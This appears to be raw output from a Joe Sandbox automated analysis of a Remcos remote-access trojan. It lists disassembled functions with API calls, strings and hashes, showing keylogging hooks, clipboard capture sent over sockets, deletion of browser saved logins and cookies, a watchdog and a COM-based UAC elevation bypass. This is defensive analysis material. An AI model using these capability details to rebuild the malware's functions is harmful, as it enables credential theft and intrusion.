Part of subcall function 0041A696: GetLocalTime.KERNEL32(00000000), ref: 0041A6B0

OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 0041125A

Strings

Remcos restarted by watchdog!, xrefs: 00410F9B
rmclient.exe, xrefs: 00411125
WDH, xrefs: 00410FF0, 00410FF6, 00411260
BG, xrefs: 0041101D
WinDir, xrefs: 00411056, 004110AB
Watchdog module activated, xrefs: 00410FBF, 00411210
\system32\, xrefs: 00411044
Watchdog launch failed!, xrefs: 004111BE
\SysWOW64\, xrefs: 0041109C
fsutil.exe, xrefs: 0041114A
svchost.exe, xrefs: 00411100
0DG, xrefs: 00410F6E

Memory Dump Source

Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: CloseOpen$CreateProcessValue$CurrentHandleLocalMutexQueryThreadTime
String ID: 0DG$Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$\SysWOW64\$\system32\$fsutil.exe$rmclient.exe$svchost.exe$BG
API String ID: 65172268-860466531
Opcode ID: 3d2ec039f958bf048a8c201d7f8a81e9ba8d6979ff7f871c800e70ef052d4e82
Instruction ID: cd90af3caa6d69ca3e9ea8718b5663318d6259183dea3b669bddfb6979e5fbe1
Opcode Fuzzy Hash: 3d2ec039f958bf048a8c201d7f8a81e9ba8d6979ff7f871c800e70ef052d4e82
Instruction Fuzzy Hash: 9F718E316042415BC614FB32D8579AE77A4AED4718F40053FF582A21F2EF7CAA49C69F

Function 0040B335 Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 145fileCOMMON

Download Yara Rule

APIs

FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040B3B4
FindClose.KERNEL32(00000000), ref: 0040B3CE
FindNextFileA.KERNEL32(00000000,?), ref: 0040B4F1
FindClose.KERNEL32(00000000), ref: 0040B517

Strings

[Firefox StoredLogins not found], xrefs: 0040B3D9
UserProfile, xrefs: 0040B365
[Firefox StoredLogins Cleared!], xrefs: 0040B504
\AppData\Roaming\Mozilla\Firefox\Profiles\, xrefs: 0040B357
\key3.db, xrefs: 0040B47B
\logins.json, xrefs: 0040B439

Memory Dump Source

Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: Find$CloseFile$FirstNext
String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
API String ID: 1164774033-3681987949
Opcode ID: a55c21d547313303409bc2568ceb902046709c86c763491b0c53e4f2ca284d26
Instruction ID: 6ff196721abdd8e0f3db8d3f3c96df629808f1f9148939b99990ee587e15bfec
Opcode Fuzzy Hash: a55c21d547313303409bc2568ceb902046709c86c763491b0c53e4f2ca284d26
Instruction Fuzzy Hash: 31512C319042195ADB14FBA1EC96AEE7768EF50318F50007FF805B31E2EF389A45CA9D

Function 0040B53A Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 130fileCOMMON

Download Yara Rule

APIs

FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040B5B2
FindClose.KERNEL32(00000000), ref: 0040B5CC
FindNextFileA.KERNEL32(00000000,?), ref: 0040B68C
FindClose.KERNEL32(00000000), ref: 0040B6B2
FindClose.KERNEL32(00000000), ref: 0040B6D1

Strings

UserProfile, xrefs: 0040B563
\AppData\Roaming\Mozilla\Firefox\Profiles\, xrefs: 0040B555
[Firefox Cookies not found], xrefs: 0040B5D7, 0040B69F
\cookies.sqlite, xrefs: 0040B62F
[Firefox cookies found, cleared!], xrefs: 0040B6E0

Memory Dump Source

Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: Find$Close$File$FirstNext
String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
API String ID: 3527384056-432212279
Opcode ID: a71f50fce03a6b89e47498d88d246ee68c23d58d563221132017ac6cdd0e80fc
Instruction ID: 007be0ece90fca0e9f39ea1f272cf2b8da877aadfcc1370f70eac597690c30d9
Opcode Fuzzy Hash: a71f50fce03a6b89e47498d88d246ee68c23d58d563221132017ac6cdd0e80fc
Instruction Fuzzy Hash: A7414B319042196ACB14F7A1EC569EE7768EF21318F50017FF801B31E2EF399A45CA9E

Function 0040E219 Relevance: 19.5, APIs: 6, Strings: 5, Instructions: 212processCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,?,?,00474358), ref: 0040E233
CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,00474358), ref: 0040E25E
Process32FirstW.KERNEL32(00000000,0000022C), ref: 0040E27A
Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E2FD
CloseHandle.KERNEL32(00000000,?,?,00474358), ref: 0040E30C

Part of subcall function 004127D5: RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
Part of subcall function 004127D5: RegSetValueExA.KERNELBASE(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
Part of subcall function 004127D5: RegCloseKey.ADVAPI32(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809

CloseHandle.KERNEL32(00000000,?,?,00474358), ref: 0040E371

Strings

ielowutil.exe, xrefs: 0040E417
Inj, xrefs: 0040E515
BG, xrefs: 0040E380
ieinstal.exe, xrefs: 0040E3D6
C:\Program Files(x86)\Internet Explorer\, xrefs: 0040E3BF

Memory Dump Source

Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: Close$CreateHandleProcess32$FileFirstModuleNameNextSnapshotToolhelp32Value
String ID: C:\Program Files(x86)\Internet Explorer\$Inj$ieinstal.exe$ielowutil.exe$BG
API String ID: 726551946-3025026198
Opcode ID: 30da1d47b11118a268f62bc142a88eb8f37d6f01f4d3dd7acdbf78fe8c56f144
Instruction ID: ff5f769c9d2eb9d60ee5c92f3007ac3329fe223f24fa54890becbfeace6a8f7f
Opcode Fuzzy Hash: 30da1d47b11118a268f62bc142a88eb8f37d6f01f4d3dd7acdbf78fe8c56f144
Instruction Fuzzy Hash: 647182311083019BC714FB61D8519EF77A5BF91358F400D3EF986631E2EF38A919CA9A

Function 004159C6 Relevance: 18.1, APIs: 12, Instructions: 80clipboardmemoryCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 004159C7
EmptyClipboard.USER32 ref: 004159D5
GlobalAlloc.KERNEL32(00002000,-00000002), ref: 004159F5
GlobalLock.KERNEL32(00000000), ref: 004159FE
GlobalUnlock.KERNEL32(00000000), ref: 00415A34
SetClipboardData.USER32(0000000D,00000000), ref: 00415A3D
CloseClipboard.USER32 ref: 00415A5A
OpenClipboard.USER32 ref: 00415A61
GetClipboardData.USER32(0000000D), ref: 00415A71
GlobalLock.KERNEL32(00000000), ref: 00415A7A
GlobalUnlock.KERNEL32(00000000), ref: 00415A83
CloseClipboard.USER32 ref: 00415A89

Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD

Memory Dump Source

Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptysend
String ID:
API String ID: 3520204547-0
Opcode ID: 6ed8a15f85b4eda99e75bc68e9c644e8b427782961166fcaf36fdd4c8f2d64f9
Instruction ID: 65deba99f03779ab530566add8b8501f772d12743f07501a5a0e0bdfe921cf26
Opcode Fuzzy Hash: 6ed8a15f85b4eda99e75bc68e9c644e8b427782961166fcaf36fdd4c8f2d64f9
Instruction Fuzzy Hash: 232183712043009BC714BBB1EC5AAAE76A9AF80752F00453EFD06961E2EF38C845D66A

Function 00418764 Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 197COMMON

Download Yara Rule

Strings

0, xrefs: 0041878D
5, xrefs: 0041893B
6, xrefs: 00418945
1, xrefs: 004187C6
7, xrefs: 0041895C
3, xrefs: 00418886
4, xrefs: 004188EA
2, xrefs: 00418826

Memory Dump Source

Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID:
String ID: 0$1$2$3$4$5$6$7
API String ID: 0-3177665633
Opcode ID: aa35b6c391b669857e709787408fc35d19a5eec55d3d5a0aced25700c68607bb
Instruction ID: 8a7243103da74f60d5bbefacb9012cb64624b509857c51ebf6f1776beea37390
Opcode Fuzzy Hash: aa35b6c391b669857e709787408fc35d19a5eec55d3d5a0aced25700c68607bb
Instruction Fuzzy Hash: EE61B470508301AEDB00EF21C862FEE77E4AF95754F40485EF591672E2DB78AA48C797

Function 00409B10 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 108keyboardthreadCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 00409B3F
GetWindowThreadProcessId.USER32(00000000,?), ref: 00409B4B
GetKeyboardLayout.USER32(00000000), ref: 00409B52
GetKeyState.USER32(00000010), ref: 00409B5C
GetKeyboardState.USER32(?), ref: 00409B67
ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 00409B8A
ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 00409BE3
ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 00409C1C

Strings

X[G, xrefs: 00409BFD

Memory Dump Source

Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: Unicode$KeyboardStateWindow$ForegroundLayoutProcessThread
String ID: X[G
API String ID: 1888522110-739899062
Opcode ID: e493efd0b8b4558b132da8245606e3aa1f2ec85b30bd84d249f064ae8ad69455
Instruction ID: b3d75429b008435a5e1dd269aa2dc422b6d7dab2ccd5499d38c457950c038251
Opcode Fuzzy Hash: e493efd0b8b4558b132da8245606e3aa1f2ec85b30bd84d249f064ae8ad69455
Instruction Fuzzy Hash: 7C318F72544308AFE700DF90EC45FDBBBECEB48715F00083ABA45961A1D7B5E948DBA6

Function 00406764 Relevance: 15.8, APIs: 2, Strings: 7, Instructions: 55COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00406788
CoGetObject.OLE32(?,00000024,004659B0,00000000), ref: 004067E9

Strings

[+] CoGetObject, xrefs: 004067C8
$, xrefs: 004067A2
[-] CoGetObject FAILURE, xrefs: 004067F1, 00406800
[+] ucmAllocateElevatedObject, xrefs: 0040676F
Elevation:Administrator!new:, xrefs: 004067A9
[+] CoGetObject SUCCESS, xrefs: 004067F8
{3E5FC7F9-9A51-4367-9063-A120244FBEC7}, xrefs: 0040677D, 00406782, 004067C1

Memory Dump Source

Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: Object_wcslen
String ID: $$Elevation:Administrator!new:$[+] CoGetObject$[+] CoGetObject SUCCESS$[+] ucmAllocateElevatedObject$[-] CoGetObject FAILURE${3E5FC7F9-9A51-4367-9063-A120244FBEC7}
API String ID: 240030777-3166923314
Opcode ID: fb4b37c01a82ea3e6f4d6ea97501aa73dd573a9fa8d004a292a27325ecfbba87
Instruction ID: 8131e8b3f96e11b5c9c7103c6ecb9350ac77814929071503a065d606a7b617cc
Opcode Fuzzy Hash: fb4b37c01a82ea3e6f4d6ea97501aa73dd573a9fa8d004a292a27325ecfbba87
Instruction Fuzzy Hash: A11170B2901118AEDB10FAA58849A9EB7BCDB48714F55007BE905F3281E77C9A148A7D

Function 004198D2 Relevance: 15.2, APIs: 10, Instructions: 228serviceCOMMON

Download Yara Rule

APIs

OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,00474918), ref: 004198E8
EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 00419937
GetLastError.KERNEL32 ref: 00419945
EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 0041997D

Memory Dump Source

Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: EnumServicesStatus$ErrorLastManagerOpen
String ID:
API String ID: 3587775597-0
Opcode ID: 3ac6ab5d256872219fc595c736f1fa07358be726c92bd725a469ceb362d7fbf0
Instruction ID: 19b9a1677c56063b65225fc9a0f34bb07ffc83518ef4baa2b379b487d5559ddd
Opcode Fuzzy Hash: 3ac6ab5d256872219fc595c736f1fa07358be726c92bd725a469ceb362d7fbf0
Instruction Fuzzy Hash: 84813F711083049BC714FB21DC959AFB7A8BF94718F50493EF582521E2EF78EA05CB9A

Function 004099E4 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 65windowCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(00000000,00000000), ref: 00409A01
SetWindowsHookExA.USER32(0000000D,004099D0,00000000), ref: 00409A0F
GetLastError.KERNEL32 ref: 00409A1B

Part of subcall function 0041A696: GetLocalTime.KERNEL32(00000000), ref: 0041A6B0

GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00409A6B
TranslateMessage.USER32(?), ref: 00409A7A
DispatchMessageA.USER32(?), ref: 00409A85

Strings

`#v, xrefs: 00409A01
Keylogger initialization failure: error , xrefs: 00409A32

Memory Dump Source

Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
String ID: Keylogger initialization failure: error $`#v
API String ID: 3219506041-3226811161
Opcode ID: 0b7731a1732448719b2bf699768c997a41862952e5444ada4ba6697cad37b533
Instruction ID: 51093fa3456b5fa5e68b97b38f4420b838fb12217e42543f2b1c539fb4fc9beb
Opcode Fuzzy Hash: 0b7731a1732448719b2bf699768c997a41862952e5444ada4ba6697cad37b533
Instruction Fuzzy Hash: 281194716043015FC710AB7AAC4996B77ECAB94B15B10057FFC45D2291FB34DE01CBAA

Function 0041B43F Relevance: 13.6, APIs: 9, Instructions: 105fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B499
FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B4CB
SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B539
DeleteFileW.KERNEL32(?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B546

Part of subcall function 0041B43F: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B51C

FindClose.KERNEL32(00000000,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B571
RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B578
GetLastError.KERNEL32(?,?,?,?,?,?,004742E0,004742F8), ref: 0041B580
FindClose.KERNEL32(00000000,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B593

Memory Dump Source

Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
String ID:
API String ID: 2341273852-0
Opcode ID: 0297631c5ee8ecb1d1a4c9aeac50dc6e63fd93f3a2d20230b54752594d88c721
Instruction ID: 0b65015344b940e71c8db0708908b2546b6e9c6134e65c3d42cb3d4753665141
Opcode Fuzzy Hash: 0297631c5ee8ecb1d1a4c9aeac50dc6e63fd93f3a2d20230b54752594d88c721
Instruction Fuzzy Hash: 4D31937180921C6ACB20D771AC49FDA77BCAF08304F4405EBF505D3182EB799AC4CA69

Function 00412F45 Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 391registrylibraryloaderCOMMON

Download Yara Rule

APIs

RegCreateKeyExW.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,00000000,00000001), ref: 0041301A
RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000001), ref: 00413026

Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD

LoadLibraryA.KERNEL32(Shlwapi.dll,SHDeleteKeyW,00000000,00000001), ref: 004131ED
GetProcAddress.KERNEL32(00000000), ref: 004131F4

Strings

Shlwapi.dll, xrefs: 004131E8
SHDeleteKeyW, xrefs: 004131E3

Memory Dump Source

Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: AddressCloseCreateLibraryLoadProcsend
String ID: SHDeleteKeyW$Shlwapi.dll
API String ID: 2127411465-314212984
Opcode ID: cdf3afb16bf801ea2708effcdf9d89e84c92b75c8538a533412dad7cd73da0bf
Instruction ID: 77d0e0f665ec2cae06f71cdba8331079b705a8b2343c1238c9795aa136ea70b2
Opcode Fuzzy Hash: cdf3afb16bf801ea2708effcdf9d89e84c92b75c8538a533412dad7cd73da0bf
Instruction Fuzzy Hash: 0AB1B571A043006BC614BA75CC979BE76989F94718F40063FF946B31E2EF7C9A4486DB

Function 0040B21B Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 48fileCOMMON

Download Yara Rule

APIs

DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 0040B257
GetLastError.KERNEL32 ref: 0040B261

Strings

UserProfile, xrefs: 0040B227
[Chrome StoredLogins found, cleared!], xrefs: 0040B287
\AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 0040B222
[Chrome StoredLogins not found], xrefs: 0040B27B

Memory Dump Source

Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: DeleteErrorFileLast
String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
API String ID: 2018770650-1062637481
Opcode ID: c40f0bbe6ac281c9bc18074575bfe4029dca0a9d2103736dcf0ec681c75a3121
Instruction ID: b4925b9b145212f78872d6bf605c5cdf000d45b1535ad2fa459343da0bf9ff5a
Opcode Fuzzy Hash: c40f0bbe6ac281c9bc18074575bfe4029dca0a9d2103736dcf0ec681c75a3121
Instruction Fuzzy Hash: 8C01623168410597CA0577B5ED6F8AE3624E921718F50017FF802731E6FF7A9A0586DE

Function 00416AB7 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 32COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000028,?), ref: 00416AC4
OpenProcessToken.ADVAPI32(00000000), ref: 00416ACB
LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00416ADD
AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00416AFC
GetLastError.KERNEL32 ref: 00416B02

Strings

SeShutdownPrivilege, xrefs: 00416AD7

Memory Dump Source

Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
String ID: SeShutdownPrivilege
API String ID: 3534403312-3733053543
Opcode ID: e04eb0b34037921419aad719b93aaa051d7dc20f4e189cf25d4eb9764effedfd
Instruction ID: c28276ca820f5d67da4083ad645d4fedab17ddc29f560671af9b7c8b6b4fa774
Opcode Fuzzy Hash: e04eb0b34037921419aad719b93aaa051d7dc20f4e189cf25d4eb9764effedfd
Instruction Fuzzy Hash: 25F0D4B5805229BBDB10ABA1EC4DEEF7EBCEF05656F100061B805E2192D6748A44CAB5

Function 004089A9 Relevance: 9.3, APIs: 6, Instructions: 288fileCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004089AE

Part of subcall function 004041F1: socket.WS2_32(?,00000001,00000006), ref: 00404212

Part of subcall function 0040428C: connect.WS2_32(?,?,?), ref: 004042A5

FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 00408A8D
FindNextFileW.KERNEL32(00000000,?), ref: 00408AE0
FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 00408AF7

Part of subcall function 00404468: WaitForSingleObject.KERNEL32(?,00000000,00401943,?,?,00000004,?,?,00000004,00475B90,00473EE8,00000000), ref: 0040450E
Part of subcall function 00404468: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,00475B90,00473EE8,00000000,?,?,?,?,?,00401943), ref: 0040453C

Part of subcall function 004047EB: WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 004047FD
Part of subcall function 004047EB: SetEvent.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404808
Part of subcall function 004047EB: CloseHandle.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404811

__CxxThrowException@8.LIBVCRUNTIME ref: 00408DA1

Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD

Memory Dump Source

Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: Find$CloseEventFileObjectSingleWait$Exception@8FirstH_prologHandleNextThrowconnectsendsocket
String ID:
API String ID: 4043647387-0
Opcode ID: 960b8c1e0533c2719e906e86d7f414d90c0ed0de55d0b27db29086ff58eb8dfa
Instruction ID: 093ddd6807f9b365337d5cb0cb3505b04edbc5c9b0fee964739ae84c01535933
Opcode Fuzzy Hash: 960b8c1e0533c2719e906e86d7f414d90c0ed0de55d0b27db29086ff58eb8dfa
Instruction Fuzzy Hash: 50A15C729001089ACB14EBA1DD92AEDB778AF54318F10427FF506B71D2EF385E498B98

Function 00419BD4 Relevance: 9.0, APIs: 6, Instructions: 39serviceCOMMON

Download Yara Rule

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,?,?,0041982A,00000000,00000000), ref: 00419BDD
OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,?,0041982A,00000000,00000000), ref: 00419BF2
CloseServiceHandle.ADVAPI32(00000000,?,?,0041982A,00000000,00000000), ref: 00419BFF
StartServiceW.ADVAPI32(00000000,00000000,00000000,?,?,0041982A,00000000,00000000), ref: 00419C0A
CloseServiceHandle.ADVAPI32(00000000,?,?,0041982A,00000000,00000000), ref: 00419C1C
CloseServiceHandle.ADVAPI32(00000000,?,?,0041982A,00000000,00000000), ref: 00419C1F

Memory Dump Source

Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: Service$CloseHandle$Open$ManagerStart
String ID:
API String ID: 276877138-0
Opcode ID: e25c39d92a846a462b53c10185a272e0ad60f5790e3d5b6c3523f631f015873d
Instruction ID: 029754fb73528063a62336f1848e5bb122dc48601db67947cc2268dfcf3d9ab0
Opcode Fuzzy Hash: e25c39d92a846a462b53c10185a272e0ad60f5790e3d5b6c3523f631f015873d
Instruction Fuzzy Hash: 2EF089755053146FD2115B31FC88DBF2AECEF85BA6B00043AF54193191DB68CD4595F5

Function 00418C79 Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 245fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(00000000,?), ref: 00418ECF
FindNextFileW.KERNEL32(00000000,?,?), ref: 00418F9B

Part of subcall function 0041B62A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B643

Strings

>G, xrefs: 00418CA9
@CG, xrefs: 00418D6F
XCG, xrefs: 00418D59

Memory Dump Source

Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: File$Find$CreateFirstNext
String ID: @CG$XCG$>G
API String ID: 341183262-3030817687
Opcode ID: 391819464a0a2cf1c4ff9909739b2089b0ccf6d7ba9323d43d3e7d0fb0295bd0
Instruction ID: 4fcfe6ad4d4b9cbb37a9178feb6c4e4542e518df657a804f5f9e1d603b628f73
Opcode Fuzzy Hash: 391819464a0a2cf1c4ff9909739b2089b0ccf6d7ba9323d43d3e7d0fb0295bd0
Instruction Fuzzy Hash: 408153315042405BC314FB61C892EEF73A9AFD1718F50493FF946671E2EF389A49C69A

Function 004158B9 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 97libraryloadershutdownCOMMON

Download Yara Rule

APIs

Part of subcall function 00416AB7: GetCurrentProcess.KERNEL32(00000028,?), ref: 00416AC4
Part of subcall function 00416AB7: OpenProcessToken.ADVAPI32(00000000), ref: 00416ACB
Part of subcall function 00416AB7: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00416ADD
Part of subcall function 00416AB7: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00416AFC
Part of subcall function 00416AB7: GetLastError.KERNEL32 ref: 00416B02

ExitWindowsEx.USER32(00000000,00000001), ref: 0041595B
LoadLibraryA.KERNEL32(PowrProf.dll,SetSuspendState,00000000,00000000,00000000), ref: 00415970
GetProcAddress.KERNEL32(00000000), ref: 00415977

Strings

PowrProf.dll, xrefs: 0041596B
SetSuspendState, xrefs: 00415966

Memory Dump Source

Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
String ID: PowrProf.dll$SetSuspendState
API String ID: 1589313981-1420736420
Opcode ID: ddda36ebdef431690859fd105a934bc1752b124657cc9f8586ecd1fce7ea85c4
Instruction ID: a9af72b6b9eaf8561cd509fc4cf8b1c610007ddf0d7e7dc7bbe2947ee761077a
Opcode Fuzzy Hash: ddda36ebdef431690859fd105a934bc1752b124657cc9f8586ecd1fce7ea85c4
Instruction Fuzzy Hash: B22161B0604741E6CA14F7B19856AFF225A9F80748F40883FB402A71D2EF7CDC89865F

Function 004511F3 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,00451512,?,00000000), ref: 0045128C
GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,00451512,?,00000000), ref: 004512B5
GetACP.KERNEL32(?,?,00451512,?,00000000), ref: 004512CA

Strings

OCP, xrefs: 00451247
ACP, xrefs: 00451211

Memory Dump Source

Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: 3e26eff85c0b030be7827b2fbb91fc7191fc27f2fce1bf15d40cdf94764cc661
Instruction ID: c7787d6075dc192170befbe1ddc6ff7be643600d5f5c624e054d22ce072cfab5
Opcode Fuzzy Hash: 3e26eff85c0b030be7827b2fbb91fc7191fc27f2fce1bf15d40cdf94764cc661
